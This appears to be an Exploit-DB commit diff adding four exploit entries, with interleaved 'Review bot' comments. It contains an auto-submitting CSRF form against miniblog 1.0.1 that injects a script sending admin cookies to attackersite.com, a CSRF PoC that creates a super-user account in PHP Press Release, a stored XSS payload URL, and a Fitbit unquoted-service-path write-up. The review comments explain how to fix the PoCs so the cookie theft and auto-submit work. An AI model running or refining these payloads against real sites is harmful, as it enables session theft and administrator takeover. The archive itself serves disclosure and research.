DB: 2016-10-10
4 new exploits
miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)
Fitbit Connect Service - Unquoted Service Path Privilege Escalation
PHP Press Release - Cross-Site Request Forgery (Add Admin)
PHP Press Release - Stored Cross Site Scripting
parent cda049fa54
commit 8ea4614148
5 changed files with 128 additions and 0 deletions
@ -36597,3 +36597,7 @@ id,file,description,date,author,platform,type,port
40479,platforms/php/webapps/40479.txt,"Entrepreneur Job Portal Script - SQL Injection",2016-10-07,OoN_Boy,php,webapps,0
40477,platforms/windows/local/40477.txt,"BlueStacks 2.5.55 - Unquoted Service Path Privilege Escalation",2016-10-07,Th3GundY,windows,local,0
40478,platforms/windows/local/40478.txt,"Waves Audio Service - Unquoted Service Path Privilege Escalation",2016-10-07,"Ross Marks",windows,local,0
40480,platforms/php/webapps/40480.txt,"miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)",2016-10-09,Besim,php,webapps,0
40482,platforms/windows/local/40482.txt,"Fitbit Connect Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local,0
40486,platforms/php/webapps/40486.txt,"PHP Press Release - Cross-Site Request Forgery (Add Admin)",2016-10-09,Besim,php,webapps,0
40487,platforms/php/webapps/40487.txt,"PHP Press Release - Stored Cross Site Scripting",2016-10-09,Besim,php,webapps,0
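Review bot: three of the four added rows (40482, 40486, 40487) carry no product version, so a reader cannot tell which release of "PHP Press Release" or "Fitbit Connect Service" was tested or whether a later build is fixed; only "miniblog 1.0.1" is pinned. Record the tested version in the title, as the neighbouring context row "BlueStacks 2.5.55 - Unquoted Service Path Privilege Escalation" does. Also, the 40486 description here reads "Cross-Site Request Forgery (Add Admin)" while the header inside platforms/php/webapps/40486.txt reads "(Add Admin - Super User )"; keep the two strings identical so a search on either one matches.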
38
platforms/php/webapps/40480.txt
Executable file
@ -0,0 +1,38 @@
# Exploit Title : miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)
# Author : Besim
# Google Dork :
# Date : 09/10/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : http://www.spyka.net/scripts/php/miniblog
# Software link :
http://dl.spyka.co.uk/scripts/php/miniblog-1-0-1.zip
Description (admin login required) :
miniblog 1.0.1 versions is vulnerable to CSRF attack, adding, delete and
edit article in the sections
Vulnerable page : http://localhost:8081/miniblog/*adm/admin.php?mode=add
Dangerous point : if used with XSS can be steal on the admin's cookie information.
*############### CSRF PoC ###############*
<html> <!-- CSRF PoC --> <body> <form action="
http://localhost:8081/miniblog/adm/admin.php?mode=add&id=%3Cbr%20/%3E%3Cb%3ENotice%3C/b%3E:%20%20Undefined%20variable:%20post%20in%20%3Cb%3EC:\xampp\htdocs\miniblog\adm\edit.php%3C/b%3E%20on%20line%20%3Cb%3E8%3C/b%3E%3Cbr%20/%3E"
method="POST"> <input type="hidden" name="data[post_title]"
value="<script>location.href = ‘http://www.attackersite.com/stealer.php?cookie=’+document.cookie;</script>"
/> <input type="hidden" name="data[post_content]"
value="tester" /> <input type="hidden" name="data[published]"
value="1" /> <input type="hidden" name="miniblog_PostBack" value="Add"
/> <input type="submit" value="Submit request" /> </form> <script>
document.forms[0].submit(); </script> </body> </html>
########################################
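Review bot: the PoC form action (the line beginning `http://localhost:8081/miniblog/adm/admin.php?mode=add&id=%3Cbr%20/%3E%3Cb%3ENotice...`) carries a URL-encoded PHP Notice ("Undefined variable: post in C:\xampp\htdocs\miniblog\adm\edit.php on line 8") copied from the author's XAMPP setup into the `id` parameter; that is environment residue, not part of the attack, and should be cut back to `admin.php?mode=add`. The `data[post_title]` value wraps the stealer URL in typographic quotes (`‘http://www.attackersite.com/stealer.php?cookie=’`), which is a JavaScript syntax error inside the injected `<script>`; use straight single quotes if the cookie-theft angle in "Dangerous point" is meant to work. The description claims add, delete and edit are all forgeable but only the add request is shown, so either drop "delete and edit" or add those requests; the "Vulnerable page" line also contains a stray `*` (`*adm/admin.php`). Minor wording: "miniblog 1.0.1 versions is vulnerable" should read "miniblog 1.0.1 is vulnerable", and "can be steal on the admin's cookie information" should read "the admin's cookie can be stolen".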
35
platforms/php/webapps/40486.txt
Executable file
@ -0,0 +1,35 @@
# Exploit Title : PHP Press Release - Cross-Site Request Forgery (Add Admin - Super User )
# Author : Besim
# Google Dork : -
# Date : 09/10/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : http://www.pagereactions.com/product.php?pku=1
Software link :
http://www.pagereactions.com/downloads/phppressrelease.zip
########################### CSRF PoC ###############################
<html>
<!-- CSRF PoC -->
<body>
<form action="http://sitename/phppressrelease/administration.php" method="POST">
<input type="hidden" name="pageaction" value="saveuser" />
<input type="hidden" name="subaction" value="submit" />
<input type="hidden" name="username" value="murat" />
<input type="hidden" name="password" value="murat" />
<input type="hidden" name="userfullname" value="murat tester" />
<input type="hidden" name="accesslevel" value="Super" />
<input type="hidden" name="userstatus" value="active" />
<input type="submit" value="Submit request" />
</form>
<script>
*document.forms[0].submit();*
</script>
</body>
</html>
####################################################################
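Review bot: the auto-submit line is wrapped in asterisks (`*document.forms[0].submit();*`), which is formatting residue from the submission and makes the `<script>` block a syntax error if the HTML is used as-is; drop the asterisks. The file also has no description section at all: state that the request is a plain POST to `administration.php` with `pageaction=saveuser` and no token field, that it must be loaded by a logged-in administrator (as the 40480 file notes with "admin login required"), and that `accesslevel=Super` together with `userstatus=active` yields an enabled super-user account with attacker-chosen credentials (`murat`/`murat` here). Pinning the tested version in the header would also let the vendor and readers tell whether a later release is affected.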
22
platforms/php/webapps/40487.txt
Executable file
@ -0,0 +1,22 @@
# Exploit Title : PHP Press Release* - Stored Cross Site
Scripting*
# Author : Besim
# Google Dork : -
# Date : 09/10/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : http://www.pagereactions.com/product.php?pku=1
# Software link :
http://www.pagereactions.com/downloads/phppressrelease.zip
Description :
Vulnerable link :
http://site_name/phppressrelease/administration.php?pageaction=newrelease
Stored XSS Payload :
http://www.site_name/phppressrelease/administration.php?pageaction=saverelease&subaction=submit&dateday=&datemonthnewedit=&dateyearnewedit=&title=<script>alert('Exploit-DB')<%2Fscript>&summary=deneme&releasebody=deneme&categorynewedit=1&publish=active
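Review bot: the exploit title is broken across two lines with stray asterisks (`# Exploit Title : PHP Press Release* - Stored Cross Site` / `Scripting*`); join it onto one line and remove the asterisks. The "Description :" heading has nothing under it, so the file never says where the stored payload executes (the release listing under `administration.php` or the public release page) or that an administrator login is needed to reach `pageaction=saverelease`; both are required for the "stored" claim to be verifiable, and the 40480 file in this same commit shows the expected "admin login required" wording. The payload URL is also inconsistently encoded (`<script>` and the quotes are raw while only the closing slash is written as `<%2Fscript>`); either encode the whole `title` value or present the request as a POST form like the 40486 PoC does for the sibling `saveuser` action.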
29
platforms/windows/local/40482.txt
Executable file
@ -0,0 +1,29 @@
Fitbit Connect Service: https://www.fitbit.com/
By Ross Marks: http://www.rossmarks.co.uk
Exploit-db: https://www.exploit-db.com/author/?a=8724
Category: Local
Tested on: Windows 10 x86/x64
1) Unquoted Service Path Privilege Escalation
Fitbit connect installs as a service with an unquoted service path running with SYSTEM privileges.
This could potentially allow an authorized but non-privileged localuser to execute arbitrary code with elevated privileges on the system.
A successful attempt would require the local attacker must insert an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run with elevated privileges.
PoC:
C:\>sc qc "Fitbit Connect"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Fitbit Connect
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Fitbit Connect Service
DEPENDENCIES :
SERVICE_START_NAME : NT AUTHORITY\NetworkService
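Review bot: the write-up contradicts its own evidence on privilege level: the prose says the service runs "with SYSTEM privileges", but the `sc qc` output shows `SERVICE_START_NAME : NT AUTHORITY\NetworkService`, so a binary planted in the unquoted path would run as NetworkService, not SYSTEM; correct the prose or explain where SYSTEM comes from. The PoC also stops at the configuration dump and never shows that a standard user can write to one of the candidate locations (`C:\Program.exe` or `C:\Program Files (x86)\Fitbit.exe`); on a default Windows 10 install a non-admin cannot create files in either place, so without `icacls` output (or equivalent) for a writable directory the "authorized but non-privileged local user" claim is unsupported. Minor wording: "localuser" should be "local user", and "would require the local attacker must insert" should read "would require the local attacker to insert".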